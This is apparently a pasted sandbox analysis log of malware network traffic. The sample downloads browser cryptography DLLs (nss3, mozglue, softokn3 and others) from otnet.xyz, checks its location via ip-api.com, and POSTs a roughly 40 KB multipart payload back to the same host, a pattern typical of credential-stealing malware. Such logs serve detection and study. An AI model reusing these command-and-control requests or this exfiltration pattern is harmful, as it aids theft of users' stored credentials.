- "data": "GET /freebl3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://otnet.xyz/freebl3.dll?ddosprotected=1",
- "user-agent": "",
- "method": "GET",
- "host": "otnet.xyz",
- "version": "1.1",
- "path": "/freebl3.dll?ddosprotected=1",
- "data": "GET /freebl3.dll?ddosprotected=1 HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://otnet.xyz/mozglue.dll",
- "user-agent": "",
- "method": "GET",
- "host": "otnet.xyz",
- "version": "1.1",
- "path": "/mozglue.dll",
- "data": "GET /mozglue.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://otnet.xyz/msvcp140.dll",
- "user-agent": "",
- "method": "GET",
- "host": "otnet.xyz",
- "version": "1.1",
- "path": "/msvcp140.dll",
- "data": "GET /msvcp140.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://otnet.xyz/nss3.dll",
- "user-agent": "",
- "method": "GET",
- "host": "otnet.xyz",
- "version": "1.1",
- "path": "/nss3.dll",
- "data": "GET /nss3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://otnet.xyz/softokn3.dll",
- "user-agent": "",
- "method": "GET",
- "host": "otnet.xyz",
- "version": "1.1",
- "path": "/softokn3.dll",
- "data": "GET /softokn3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://otnet.xyz/vcruntime140.dll",
- "user-agent": "",
- "method": "GET",
- "host": "otnet.xyz",
- "version": "1.1",
- "path": "/vcruntime140.dll",
- "data": "GET /vcruntime140.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "--1BEF0A57BE110FD467A--\r\n",
- "uri": "http://ip-api.com/line/",
- "user-agent": "",
- "method": "POST",
- "host": "ip-api.com",
- "version": "1.1",
- "path": "/line/",
- "data": "POST /line/ HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 25\r\nHost: ip-api.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n--1BEF0A57BE110FD467A--\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://otnet.xyz/",
- "user-agent": "",
- "method": "POST",
- "host": "otnet.xyz",
- "version": "1.1",
- "path": "/",
- "data": "POST / HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 40736\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
- "port": 80
- * Network Communication - SMTP:
- * Network Communication - Hosts:
- * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement